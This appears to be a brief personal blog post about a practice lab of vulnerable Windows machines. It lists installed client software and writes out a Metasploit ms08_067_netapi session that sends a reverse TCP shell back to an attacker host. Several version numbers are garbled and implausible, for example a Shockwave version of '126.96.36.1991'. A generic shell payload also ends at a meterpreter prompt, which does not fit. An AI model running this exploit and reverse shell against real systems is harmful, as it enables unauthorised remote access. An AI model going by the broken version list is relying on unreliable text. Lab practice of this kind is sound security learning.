So to get some practice I’ve built a lab of obscenely vulnerable Windows client machines. While this doesn’t really represent any kind of real-world situation, it’s been a good place for me to play around and test things while actually seeing some results. Though it does kind of feel like clubbing a baby seal at times.
- XP SP3 or unpatched 7.
- Adobe Reader 8.0
- Adobe AIR 220.127.116.11
- Adobe Flash 18.104.22.168
- Chrome 22.0.1229.0
- Firefox 17.0
- Java JRE 7 update 2
- RealPlayer 22.214.171.124
- Shockwave 126.96.36.1991
The process goes like this: install OS, join domain, install all the software, configure the profile, snapshot the VM, ready for use!
The first tests I’ve been doing have all been MITM-based browser attacks, but today I felt like being a bit more direct.
I initially tried using exploit/windows/dcerpc/ms03_026_dcom. The first run indicated the port wasn’t open. Which made sense because I never opened that port on the target. So I created a file share to “prime the pump”. Still no dice.
Next up was exploit/windows/smb/ms08_067_netapi. This one worked, and I got a shell. I’m documenting the actual text below so I have it for later.
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.100 (target)
msf exploit(ms08_067_netapi) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.50 (Kali)
msf exploit(ms08_067_netapi) > exploit
meterpreter > (Success!)
I’ll probably mess around more later today.